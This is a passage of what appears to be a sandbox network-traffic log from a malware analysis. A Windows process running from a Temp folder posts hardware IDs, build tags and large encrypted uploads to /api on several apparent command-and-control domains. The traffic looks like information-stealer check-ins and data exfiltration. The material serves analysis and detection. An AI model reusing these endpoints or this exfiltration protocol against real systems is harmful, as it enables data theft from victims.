2024-12-19 09:12:39 UTC	1369	IN	Data Raw: 53 63 51 34 39 2f 71 44 2b 6e 7a 4c 53 43 76 6a 70 4f 4a 4f 2f 41 41 75 68 75 4b 30 4d 65 79 6b 59 53 75 5a 4f 58 75 30 4d 58 55 4d 6c 54 46 6d 4c 56 47 38 4c 35 6e 57 61 47 47 31 66 59 74 34 46 61 36 52 39 75 6c 6e 4f 7a 4e 32 4f 30 6d 2f 35 32 56 7a 4a 41 77 56 76 58 66 2f 42 32 6f 38 32 64 5a 74 34 61 55 74 57 65 69 48 76 6c 56 79 61 4c 36 67 72 2b 49 72 6e 53 6c 78 73 76 74 34 44 77 56 37 5a 47 6a 57 66 66 7a 4f 31 6e 67 68 6f 75 50 4e 66 68 59 78 51 32 4b 2f 59 54 6b 33 37 61 37 65 36 62 4b 30 63 4b 54 43 52 33 31 6e 71 6c 45 36 76 46 30 46 50 2f 42 6b 2f 67 31 74 6c 69 69 45 34 53 6c 77 4b 33 66 32 2b 67 6e 38 35 69 55 68 49 35 37 43 61 32 47 35 46 6d 6d 36 79 64 58 72 39 53 54 37 6a 58 33 47 2b 68 52 7a 4f 62 53 76 39 69 39 68 6c 57 6a 77 63 54 66 Data Ascii: ScQ49/qD+nzLSCvjpOJO/AAuhuK0MeykYSuZOXu0MXUMlTFmLVG8L5nWaGG1fYt4Fa6R9ulnOzN2O0m/52VzJAwVvXf/B2o82dZt4aUtWeiHvlVyaL6gr+IrnSlxsvt4DwV7ZGjWffzO1nghouPNfhYxQ2K/YTk37a7e6bK0cKTCR31nqlE6vF0FP/Bk/g1tliiE4SlwK3f2+gn85iUhI57Ca2G5Fmm6ydXr9ST7jX3G+hRzObSv9i9hlWjwcTf
2024-12-19 09:12:39 UTC	1369	IN	Data Raw: 65 4f 35 42 65 32 34 53 35 4d 76 4a 47 44 35 47 72 2b 41 62 70 56 69 72 32 57 38 74 2b 52 2b 43 33 6f 69 73 54 42 7a 43 38 56 39 5a 7a 6a 63 64 69 56 64 68 37 70 78 64 32 68 5a 50 49 33 2b 55 6a 47 36 63 4f 71 6f 62 32 74 64 71 62 44 77 4d 58 50 61 56 69 6a 6b 4f 51 58 33 2f 4e 6b 45 2b 69 4b 6d 2f 70 6b 6f 78 62 78 56 63 32 6c 2b 2f 4c 66 6d 2f 67 74 36 50 6a 45 33 64 41 75 41 50 4c 53 67 6b 7a 68 74 58 59 58 2b 4e 65 54 2b 44 57 32 57 4b 49 52 68 4b 58 41 72 64 2f 62 36 43 66 7a 6d 4a 53 45 6a 6e 73 4a 72 59 62 6b 57 61 62 72 4a 6c 65 76 31 4a 50 75 4e 66 63 57 39 30 4c 4a 36 38 65 75 6a 59 57 37 59 36 75 4b 2b 65 33 37 4a 42 76 6d 6b 61 4e 78 32 4a 4a 2f 43 65 4c 4a 31 49 68 4c 68 77 6e 39 55 34 6a 44 78 36 71 63 77 2f 59 31 73 49 32 66 6b 2f 38 6a 42 Data Ascii: eO5Be24S5MvJGD5Gr+AbpVir2W8t+R+C3oisTBzC8V9ZzjcdiVdh7pxd2hZPI3+UjG6cOqob2tdqbDwMXPaVijkOQX3/NkE+iKm/pkoxbxVc2l+/Lfm/gt6PjE3dAuAPLSgkzhtXYX+NeT+DW2WKIRhKXArd/b6CfzmJSEjnsJrYbkWabrJlev1JPuNfcW90LJ68eujYW7Y6uK+e37JBvmkaNx2JJ/CeLJ1IhLhwn9U4jDx6qcw/Y1sI2fk/8jB

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.6	50191	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:31 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: grannyejh.lat
2024-12-19 09:12:31 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-19 09:12:45 UTC	1121	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=djkr11nkco3lkvnopai0li12ab; expires=Mon, 14 Apr 2025 02:59:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOdRFVYDmE8PAErHdhklrRr31SqRWORmM62ZfZIJD4Ipug1WH91d9xJs91hO5IQP6eXiv92KdL82BSi9b0wFUJO58LVjGvbWrknpkZNA2j86w6LFCwkK%2F%2BJxN%2BYIoTG%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46457b7a187d1a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1773&rtt_var=700&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=904&delivery_rate=1524008&cwnd=179&unsent_bytes=0&cid=f1869370d9457c6d&ts=14865&x=0"
2024-12-19 09:12:45 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-19 09:12:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	50192	172.67.179.109	443	3924	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:31 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: grannyejh.lat
2024-12-19 09:12:31 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=86648A4BEF1E4DA3AC8923850305D13E
2024-12-19 09:12:47 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q32r5p3h51ujbua83hjv36ug5i; expires=Mon, 14 Apr 2025 02:59:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bXSOHVBVw9LkL47M7xlV0lcL%2B47fNalMvUstBRqMXfdxUXfOHJO%2F%2BIJ6P%2FQpgW7T%2B%2BDJ3uT2RU3OhkP9aybdF61Sbaw1GgJjqCasE%2Fl9jBpgaYyO5He2lB8429zsKyo3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46458079b28c63-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1812&rtt_var=686&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=979&delivery_rate=1588683&cwnd=226&unsent_bytes=0&cid=bf4431971f5d344f&ts=15306&x=0"
2024-12-19 09:12:47 UTC	214	IN	Data Raw: 64 30 0d 0a 46 52 36 38 57 35 75 44 59 52 76 7a 49 41 65 4a 66 73 79 6e 6a 33 79 35 47 38 61 50 4f 35 50 6e 6d 44 56 67 30 73 55 62 51 6e 78 4f 5a 5a 34 75 75 62 6c 44 63 34 64 55 64 37 4d 69 34 2f 75 67 54 59 45 75 36 4c 30 4b 70 73 6d 70 42 46 50 38 39 43 30 65 55 33 70 34 32 67 65 30 35 77 52 39 33 55 56 2f 37 46 7a 67 68 65 6b 49 6d 79 48 32 6f 78 6e 32 78 61 49 46 48 66 36 2b 4f 54 64 65 4c 7a 7a 55 4c 2b 2f 7a 57 30 66 63 66 43 69 34 52 76 6d 4a 76 55 32 4d 4e 66 65 2b 43 4c 33 57 72 6d 6c 50 6f 62 46 2b 49 78 46 4a 4d 63 34 36 39 65 63 4f 64 74 31 46 66 2b 78 63 34 49 58 70 43 4a 73 68 39 71 4d 5a 39 73 57 69 42 52 32 50 0d 0a Data Ascii: d0FR68W5uDYRvzIAeJfsynj3y5G8aPO5PnmDVg0sUbQnxOZZ4uublDc4dUd7Mi4/ugTYEu6L0KpsmpBFP89C0eU3p42ge05wR93UV/7FzghekImyH2oxn2xaIFHf6+OTdeLzzUL+/zW0fcfCi4RvmJvU2MNfe+CL3WrmlPobF+IxFJMc469ecOdt1Ff+xc4IXpCJsh9qMZ9sWiBR2P
2024-12-19 09:12:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.6	50197	104.21.12.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:38 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1CK72DRIAH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48561 Host: lossekniyyt.click
2024-12-19 09:12:38 UTC	15331	OUT	Data Raw: 2d 2d 31 43 4b 37 32 44 52 49 41 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 31 43 4b 37 32 44 52 49 41 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 43 4b 37 32 44 52 49 41 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 39 5a 31 63 79 63 2d 2d 0d 0a 2d 2d 31 43 4b 37 32 44 52 49 41 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --1CK72DRIAHContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--1CK72DRIAHContent-Disposition: form-data; name="pid"1--1CK72DRIAHContent-Disposition: form-data; name="lid"9Z1cyc----1CK72DRIAHContent-Dispo
2024-12-19 09:12:38 UTC	15331	OUT	Data Raw: 6a 0b 98 70 60 29 43 18 58 b1 70 53 d3 f7 9b cf 4c 4a e3 f9 81 0b 17 8d 12 8f 90 bb d4 02 f2 61 fe e3 9b 57 9b 59 e2 14 9e 37 41 2b 02 d2 97 b9 15 57 d2 f1 33 70 2e b0 82 dd e2 cc 1b f4 9f e7 22 0a bb f2 88 ee 0f 83 53 f6 65 ff 3a a4 1c a0 cf 09 18 48 ef 80 95 4f 6a 6f ab bb 0e 10 28 65 7b 26 2e 95 fa 7d 36 d8 67 b4 fd f9 41 4c 04 79 64 e1 6d 11 65 e2 9a 2a 87 e7 72 23 2f f5 e1 1d e0 80 eb fb 3d a4 dd 74 28 97 f7 d4 67 eb 13 13 81 cd d1 ba c5 5e 9f 18 a7 eb 29 73 53 bd 73 8f e4 4d 67 c0 b0 4a 71 77 76 43 0d 0b 1f 74 e1 00 ce fa 29 e5 e3 f4 af 26 de e5 e9 37 bd 0c b8 26 48 07 6b 28 55 8a cd 30 37 af 34 09 5b 1b 97 a5 47 2d f6 48 3e cc c8 e3 db bd a8 de 6f a1 b9 91 f6 0a 04 0f 8f 4f cd 6a 93 e8 82 e8 74 ea d2 d7 86 d8 23 aa 21 43 32 fb b6 90 6d 4d 78 9e d4 Data Ascii: jp`)CXpSLJaWY7A+W3p."Se:HOjo(e{&.}6gALydme*r#/=t(g^)sSsMgJqwvCt)&7&Hk(U074[G-H>oOjt#!C2mMx
2024-12-19 09:12:38 UTC	15331	OUT	Data Raw: 9c dc 22 f9 ab 4a b9 35 d0 95 fc 72 e9 f4 41 3d 55 ba df c7 fd dd f9 43 da 3e 05 b2 ee 73 e9 e4 1d 1f a6 b0 c6 fb 8f 1e 3d e5 f3 bf d1 05 9d bf b6 28 95 21 20 ed 80 ac 94 d8 37 9d ca d6 a3 c3 22 c7 f0 b9 0c 2a f9 4f 60 77 ac fb f4 88 0f f0 62 bf ee 73 dd 5e d3 21 f1 dd c9 79 f6 e6 f9 5d dd c5 a3 61 ca 2e e4 bc 90 76 2b b1 61 93 92 00 9c 07 fa 6d d2 b1 1d 9b c7 5f 26 32 ac f3 02 e6 dd 06 cc 7d e4 97 ba 15 05 36 e3 3f 06 14 a9 c7 a6 22 1e 10 bb c6 33 71 0e c4 9e dc 4e ff 7d 57 ab 1e 9d 1f 62 72 78 27 7a fe 0b 61 c5 81 0d 50 74 60 6f 62 e0 19 f4 18 8f 83 89 cb 4d a7 40 3b 68 7b c3 9f ac 1c 50 4c 53 7f df 85 7b a5 58 52 18 70 b2 d4 9a e9 e7 8b df 22 65 da f5 5d 01 ba 9f 25 d6 00 32 38 8f 7b b9 c0 98 fb b1 b0 82 ea 21 97 87 23 dc f0 6b 01 51 17 ae 62 f3 d7 f3 Data Ascii: "J5rA=UC>s=(! 7"*O`wbs^!y]a.v+am_&2}6?"3qN}Wbrx'zaPt`obM@;h{PLS{XRp"e]%28{!#kQb
2024-12-19 09:12:38 UTC	2568	OUT	Data Raw: 0d c2 b4 da 91 7e 0e 17 33 af fb 66 a0 c4 4b 65 b4 2b 0a d9 ad ac 56 7f c8 f4 59 47 ce cf 05 d6 b4 43 ac 9a 3e 77 be d4 a5 91 60 ae e5 a4 57 10 21 b0 e5 95 cc bc dc a0 e3 90 01 e2 6a f6 e6 a7 65 8c 8b 9a 0c 7a d9 91 1e 49 83 d3 5d 91 55 af b6 27 1e 0b db 0a bb a4 c7 a1 18 2f 75 48 b5 8d 97 01 36 3f 34 dd 14 57 e0 df 16 94 9f da 63 00 df 0f cd 8e cb 30 3d a2 fd c3 c1 c1 85 3a 6b 35 4a 1a ac 1b 95 25 58 b8 a5 f9 c6 40 53 a8 d7 e4 79 68 26 98 42 8c 0b 42 0d b5 67 13 82 7c a3 3b 01 0b be b5 dc 0d 94 47 7e 81 4d b9 dc 15 d3 21 55 08 18 59 50 68 a3 85 75 87 94 c8 94 6c 5a 76 1d b2 24 50 59 50 ac 37 63 a4 d7 2f 64 2b 32 44 9c 50 33 ac b2 de f5 28 90 a1 be 33 4c a6 fd a4 9b 29 4f 01 78 2a cb 26 05 13 9a 13 13 29 72 92 26 c7 59 5e 3d f5 a3 ab 3a 8b be b1 5a f3 6d Data Ascii: ~3fKe+VYGC>w`W!jezI]U'/uH6?4Wc0=:k5J%X@Syh&BBg\|;G~M!UYPhulZv$PYP7c/d+2DP3(3L)Ox*&)r&Y^=:Zm
2024-12-19 09:12:52 UTC	1139	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n240gj98k06ufojv359410o8to; expires=Mon, 14 Apr 2025 02:59:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ic%2BR1poj0R3vd1HivlWcY9Ru0YCkR%2F7rNrn9I4PsQ6cwOSYhLPQ5lJgzS%2BHg6gXWKmv%2FZT2teOhCZSF%2B9GR1MCDgAOATbkfzPyxr4i7OdczlhsVenJyg6oqFwWJKUCVJ10TTJg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4645aa594e7d0b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1884&rtt_var=741&sent=29&recv=54&lost=0&retrans=0&sent_bytes=2842&recv_bytes=49604&delivery_rate=1441975&cwnd=227&unsent_bytes=0&cid=267af53e21ad44a9&ts=14195&x=0"
2024-12-19 09:12:52 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:12:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.6	50205	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:39 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TC0L05BWZFTRR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15080 Host: grannyejh.lat
2024-12-19 09:12:39 UTC	15080	OUT	Data Raw: 2d 2d 54 43 30 4c 30 35 42 57 5a 46 54 52 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 54 43 30 4c 30 35 42 57 5a 46 54 52 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 43 30 4c 30 35 42 57 5a 46 54 52 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 54 43 30 4c 30 35 Data Ascii: --TC0L05BWZFTRRContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA300D57F9DDD37BE0C--TC0L05BWZFTRRContent-Disposition: form-data; name="pid"2--TC0L05BWZFTRRContent-Disposition: form-data; name="lid"yau6Na--6989783370--TC0L05
2024-12-19 09:12:56 UTC	1122	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=olq5p9kdoe3p07qnvefkgbmkv4; expires=Mon, 14 Apr 2025 02:59:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9sbcXbUgFSayhEPbYzCrXIPQsRjw6odjmOgU%2BfgFus2xUeBMJjeWg0mU6JcB4aROBtZxewUP%2FEDs1cdaoMYyzbvJqheHYIUahIRdx83zHLMtA%2FsTl6j793zLLcldmQPE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4645af8ff617b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1592&rtt_var=605&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2831&recv_bytes=16012&delivery_rate=1796923&cwnd=252&unsent_bytes=0&cid=2f86af706ffb0ad0&ts=16870&x=0"
2024-12-19 09:12:56 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:12:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.6	50207	172.67.177.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:40 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JXW1BW3VVDHZW2P14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15094 Host: cheapptaxysu.click
2024-12-19 09:12:40 UTC	15094	OUT	Data Raw: 2d 2d 4a 58 57 31 42 57 33 56 56 44 48 5a 57 32 50 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 58 57 31 42 57 33 56 56 44 48 5a 57 32 50 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 58 57 31 42 57 33 56 56 44 48 5a 57 32 50 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 4a 58 57 31 Data Ascii: --JXW1BW3VVDHZW2P14Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--JXW1BW3VVDHZW2P14Content-Disposition: form-data; name="pid"2--JXW1BW3VVDHZW2P14Content-Disposition: form-data; name="lid"CZJvss----JXW1
2024-12-19 09:12:54 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lnrcoeupmp1cm5l157m1nlmfpm; expires=Mon, 14 Apr 2025 02:59:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cNOvEjJ66M5K9Z2qE1%2Fc9PsK83akcSAdyFIpFpSX6tQdPTyuK6UMs63BcvjZaeZuS6ahafotaG4aIZrEmEzyoL8f8BCDFZI%2BK2QWdd2RUA25mCuShgRAbOnAJI%2Bh4nJypgOxRKs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4645b53a964270-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1727&rtt_var=659&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2843&recv_bytes=16035&delivery_rate=1645997&cwnd=225&unsent_bytes=0&cid=0793376ca8725ba0&ts=14505&x=0"
2024-12-19 09:12:54 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:12:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.6	50213	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:46 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: grannyejh.lat
2024-12-19 09:12:46 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-19 09:13:01 UTC	1117	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e23a0jr3so9p9unie0qdk380o3; expires=Mon, 14 Apr 2025 02:59:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zXYlF7qsS0PoZMlSjzjgtsv3v05C%2FjgDJf2VItwVX8K7rfANMisPhee6VszErDJI8zmKNC5GVcWyMcV1vNiPnfoTkO4fFt5YKmB38wbfyYOcsXXcZgSXrjq%2BPr9LPZUh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4645dea85bc334-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1663&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1755862&cwnd=247&unsent_bytes=0&cid=58887eca6a59fb0b&ts=14373&x=0"
2024-12-19 09:13:01 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-19 09:13:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.6	50214	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:47 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: grannyejh.lat
2024-12-19 09:12:47 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-19 09:13:01 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0g9bu7k0qt6jbm4g95kqigu87a; expires=Mon, 14 Apr 2025 02:59:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FEAhwq%2FvZi%2FgpJ8XVEqtvICihtim8vHHECVtciSMWnmv1752YqxGzZ28r06GTkDoOfF3AJs8DAEDIhMukYwFNUhKnPKRo8GogDFG9jKX%2BohbX4g5%2BLqEOcQeQKOe5%2FN5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4645e0abba4369-EWR alt-svc: h3=":443"; ma=86400 server-timing: 